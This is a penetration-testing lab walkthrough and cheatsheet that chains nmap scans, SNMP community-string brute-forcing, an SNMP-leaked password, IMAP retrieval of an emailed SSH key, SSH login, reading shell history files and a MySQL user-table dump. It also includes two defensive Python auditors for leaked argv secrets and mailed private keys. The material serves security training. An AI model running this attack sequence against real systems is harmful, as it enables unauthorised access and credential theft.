🛡️ Methodology Checklist
- Full TCP scan: `nmap -p- --min-rate 5000 -sV -sC [TARGET]`
- UDP scan: `sudo nmap -sU --top-ports 20 [TARGET]`
- SNMP walk: `snmpwalk -v2c -c [COMMUNITY] [TARGET]`
- FTP anonymous login check
- SMB null session: `smbclient -N -L //[TARGET]`
- SSH version and key fingerprint: `ssh-keyscan [TARGET]`
- DNS zone transfer attempt against discovered DNS server
- IPMI cipher 0 check: `ipmitool -I lanplus -C 0 -H [TARGET] -U admin -P "" user list`
🎯 Operational Context
Think Dumber First: These commands are the exact sequence for the Hard Footprinting Lab. Run them in order. Each command builds on the previous result. When a command fails, check the previous step’s output for the correct parameter values. All flags in `[brackets]` must be replaced with discovered values.
When you land here: Working through the Hard Footprinting Lab. Execute commands sequentially. Fill in discovered values (IPs, usernames, ports) as you progress. Expected output described in comments. Deviation from expected output means a previous step needs revisiting.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `sudo nmap -p- --min-rate 1000 -T4 [TARGET_IP]` | Quick all-ports TCP scan |
| `sudo nmap -sV -sC [TARGET_IP]` | Version + script scan |
| `sudo nmap -sU -p- [TARGET_IP]` | UDP scan — don’t miss SNMP on 161 |
| `for community in public private manager admin backup cisco; do snmpwalk -v 2c -c $community [TARGET_IP] 1.3.6.1.2.1.1.1.0; done` | Manual community string brute-force |
| `snmpwalk -v 2c -c backup [TARGET_IP]` | Full SNMP walk with confirmed string |
| `openssl s_client -connect [TARGET_IP]:993` | Connect to IMAPS |
| `A1 LOGIN [USER] [PASS]` | IMAP authentication |
| `A1 SELECT INBOX` | Select inbox folder |
| `A1 FETCH 1 BODY[]` | Read first email |
| `chmod 600 ~/tom_key` | Fix SSH key permissions |
| `ssh -i ~/tom_key [USER]@[TARGET_IP]` | SSH with private key |
| `cat .bash_history && cat .mysql_history` | Check command history |
| `mysql -u [USER] -p` | Local MySQL login |
| `use users; select * from users;` | Dump users table |
🔬 Deep Dive & Workflow
Attack Chain: UDP Scan → SNMP credential leak → IMAP SSH key retrieval → SSH access → MySQL privilege escalation
Phase 1: Recon
- Standard TCP scans miss SNMP — always include `sudo nmap -sU -p 161`
- Key finding: Port 161/UDP (SNMP)
Phase 2: SNMP — Entry Point
- `snmp-brute` often fails on VPN due to packet loss → use manual loop
- Community string `backup` works → full walk reveals a process running with a cleartext password in its CLI arguments
- Critical Finding: `tom:[PASSWORD]` in process arguments
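Why the walk leaks the password: HOST-RESOURCES-MIB exposes hrSWRunParameters (every process's argv) to anyone holding a read community, so a password typed as `mysql -u tom -p<password>` is readable over UDP/161. The following is an added example, not part of the lab cheatsheet: a defender-side audit that flags credential-shaped arguments in a saved snmpwalk dump or in the host's own `/proc/<pid>/cmdline`, reporting only a redacted prefix. The pattern set and the sample walk lines are constructed for illustration; the `/proc` reader assumes Linux.

```python
"""Audit process argument lists for secrets passed on the command line.

Added example (not part of the lab cheatsheet). SNMP's HOST-RESOURCES-MIB exposes
hrSWRunParameters (the argv of every process) to anyone holding a read community,
so a password typed as `mysql -u tom -p<password>` is readable over UDP/161.
The same check can be run on the host itself via /proc (Linux only, assumed).
"""
from __future__ import annotations

import re
from pathlib import Path
from typing import Iterable

# Argument shapes that carry a secret inline. Assumed starter set; extend per estate.
CREDENTIAL_PATTERNS = [
    # mysql-style "-pSECRET": value glued to the flag. "-p 161" and "-p-" (nmap) do not match.
    ("mysql -p<secret>", re.compile(r"(?<![\w-])-p(?P<secret>[^\s-]\S*)")),
    # long form "--password=SECRET"
    ("--password=<secret>", re.compile(r"--password=(?P<secret>\S+)")),
    # environment-style "PASSWORD=SECRET" handed over as an argument
    ("KEY=<secret>", re.compile(r"(?:^|\s)(?:PASS|PASSWORD|PWD|SECRET)=(?P<secret>\S+)", re.I)),
]

# One hrSWRunParameters row as printed by snmpwalk (net-snmp text output).
SNMP_PARAM_LINE = re.compile(r'hrSWRunParameters\.(?P<pid>\d+) = STRING: "(?P<args>.*)"$')


def redact(secret: str) -> str:
    """Keep a recognisable prefix for the report, never the whole value."""
    return secret[:2] + "*" * max(len(secret) - 2, 3)


def audit_arguments(source: str, args: str) -> list[dict]:
    """Return one finding per credential-shaped argument in a single argv string."""
    findings = []
    for label, pattern in CREDENTIAL_PATTERNS:
        for m in pattern.finditer(args):
            findings.append({"source": source, "pattern": label, "secret": redact(m.group("secret"))})
    return findings


def audit_snmp_walk(lines: Iterable[str]) -> list[dict]:
    """Audit hrSWRunParameters rows from a saved snmpwalk dump."""
    findings = []
    for line in lines:
        m = SNMP_PARAM_LINE.search(line.strip())
        if m:
            findings += audit_arguments(f"pid {m.group('pid')}", m.group("args"))
    return findings


def audit_local_processes(proc: Path = Path("/proc")) -> list[dict]:
    """Same check against /proc/<pid>/cmdline on the host itself (argv is NUL-separated)."""
    findings = []
    for cmdline in proc.glob("[0-9]*/cmdline"):
        try:
            args = cmdline.read_bytes().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:  # process exited or not readable
            continue
        findings += audit_arguments(f"pid {cmdline.parent.name}", args)
    return findings


# Constructed sample of snmpwalk output; not captured from any real host or the lab.
SAMPLE_WALK = [
    'HOST-RESOURCES-MIB::hrSWRunParameters.412 = STRING: "-sU -p 161 10.0.0.5"',
    'HOST-RESOURCES-MIB::hrSWRunParameters.1031 = STRING: "-u tom -pExampleSecret1 -e \'select 1\'"',
    'HOST-RESOURCES-MIB::hrSWRunParameters.1055 = STRING: "/opt/app/run --password=s3cr3t --port 8080"',
    'HOST-RESOURCES-MIB::hrSWRunParameters.1200 = STRING: ""',
]

if __name__ == "__main__":
    for finding in audit_snmp_walk(SAMPLE_WALK):
        print(finding)
```

Run it against `snmpwalk ... HOST-RESOURCES-MIB::hrSWRunParameters > walk.txt` output, or call `audit_local_processes()` as root on the host; every hit is a password that should move to a config file, a credentials file (`~/.my.cnf` for MySQL) or an interactive prompt, and the SNMP community that exposed it should be rotated and restricted by source address.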
Phase 3: IMAP — Pivoting
- Connect to port 993 (IMAPS) with `openssl s_client`
- Login with SNMP-leaked credentials
- Email in INBOX contains OpenSSH private key for `tom`
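The key arrives inside an IMAP literal (`* 1 FETCH (BODY[] {size}` followed by exactly that many bytes). The following is an added example, not part of the lab cheatsheet, that reads that same response shape from the defender's side: it splits a raw FETCH response into messages by the literal byte counts, finds PEM-style private key blocks in each, and for OpenSSH keys decodes the `openssh-key-v1` header to report whether the key is passphrase-protected. The literal syntax is from RFC 3501; the sample message and the key blob are constructed stubs, not real keys.

```python
"""Scan a raw IMAP FETCH response for private keys stored in mail.

Added example (not part of the lab cheatsheet). Phase 3 retrieves an OpenSSH
private key from a mailbox over IMAPS; the same parsing lets a defender sweep
mailboxes for key material that should never have been mailed. Assumed shapes:
the "* n FETCH (BODY[] {size}" literal syntax from RFC 3501 and the
"openssh-key-v1" binary layout; the sample message and key blob below are
constructed stubs, not real keys.
"""
from __future__ import annotations

import base64
import re
import struct

# IMAP literal: "* 1 FETCH (BODY[] {1234}\r\n" followed by exactly 1234 bytes.
LITERAL = re.compile(rb"\* (?P<seq>\d+) FETCH \(BODY\[\] \{(?P<size>\d+)\}\r\n")
# Any PEM-style private key block (OPENSSH, RSA, EC, ENCRYPTED, or bare PRIVATE KEY).
KEY_BLOCK = re.compile(
    rb"-----BEGIN (?P<type>[A-Z ]*PRIVATE KEY)-----\r?\n(?P<body>.*?)-----END (?P=type)-----",
    re.S,
)
OPENSSH_MAGIC = b"openssh-key-v1\0"


def parse_fetch_literals(raw: bytes) -> dict[int, bytes]:
    """Split a FETCH response into {sequence number: message bytes} using the literal byte counts."""
    messages: dict[int, bytes] = {}
    pos = 0
    while (m := LITERAL.search(raw, pos)) is not None:
        start, size = m.end(), int(m.group("size"))
        messages[int(m.group("seq"))] = raw[start:start + size]
        pos = start + size
    return messages


def inspect_openssh_key(body: bytes) -> dict:
    """Decode the base64 body and read the cipher name: "none" means the key is unencrypted."""
    blob = base64.b64decode(b"".join(body.split()))
    if not blob.startswith(OPENSSH_MAGIC):
        return {"format": "unknown"}
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", blob[off:off + 4])
    cipher = blob[off + 4:off + 4 + n]
    return {"format": "openssh-key-v1", "encrypted": cipher != b"none"}


def scan_mailbox(raw: bytes) -> list[dict]:
    """Report every private key block found in every message of a FETCH response."""
    findings = []
    for seq, message in parse_fetch_literals(raw).items():
        for m in KEY_BLOCK.finditer(message):
            finding = {"seq": seq, "type": m.group("type").decode()}
            if finding["type"] == "OPENSSH PRIVATE KEY":
                finding.update(inspect_openssh_key(m.group("body")))
            findings.append(finding)
    return findings


def stub_openssh_blob(cipher: bytes = b"none") -> bytes:
    """Constructed key-shaped blob: magic, cipher, kdf, then filler instead of real key material."""
    raw = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher + struct.pack(">I", 4) + b"none" + b"\0" * 32
    return base64.encodebytes(raw)


# Constructed sample: one message whose body carries an unencrypted OpenSSH key block.
SAMPLE_MESSAGE = (
    b"From: it-support@example.invalid\r\nSubject: your ssh key\r\n\r\n"
    b"Here is the key you asked for.\r\n"
    b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + stub_openssh_blob() + b"-----END OPENSSH PRIVATE KEY-----\n"
)
SAMPLE_FETCH_RESPONSE = (
    b"* 1 FETCH (BODY[] {" + str(len(SAMPLE_MESSAGE)).encode() + b"}\r\n" + SAMPLE_MESSAGE + b")\r\n"
    b"A1 OK Fetch completed.\r\n"
)

if __name__ == "__main__":
    for finding in scan_mailbox(SAMPLE_FETCH_RESPONSE):
        print(finding)
```

An unencrypted key in a mailbox is a finding on its own: the same IMAP credential that the SNMP walk leaked turns it into an SSH login, which is exactly the pivot this lab chains. Keys found this way should be revoked from `authorized_keys` on every host and reissued with a passphrase.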
Phase 4: SSH Access
- Save private key → `chmod 600 ~/tom_key` (mandatory — SSH rejects world-readable keys)
- `ssh -i ~/tom_key tom@[TARGET_IP]`
Phase 5: MySQL Privilege Escalation
- `cat .bash_history` → reveals `mysql -u tom -p` usage
- Login to local MySQL with SNMP-leaked password
- `use users; select * from users;` → reveals HTB user credentials
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Command fails with ‘connection refused’ | Wrong IP or service not running on expected port | Re-run nmap on that specific target; confirm service port from scan output |
| Authentication fails despite using discovered credentials | Credential belongs to different service | Try credentials on all open services; check for domain prefix requirement |
| nmap shows port filtered that should be open | Firewall or lab VM firewall active | Try from different approach; use existing access to reach service internally |
| Command returns partial output then hangs | Connection timeout or service instability | Add timeout flags; retry; some lab services restart after certain operations |
| Discovered path/file not accessible | Permission denied or path incorrect | Verify exact path with ls -la; check current user privileges; look for alternate paths |
📝 Reporting Trigger
Finding Title: (Lab command reference — no vulnerability per se; use these command sequences as evidence of your methodology in reporting exercises. Document which commands produced key findings.)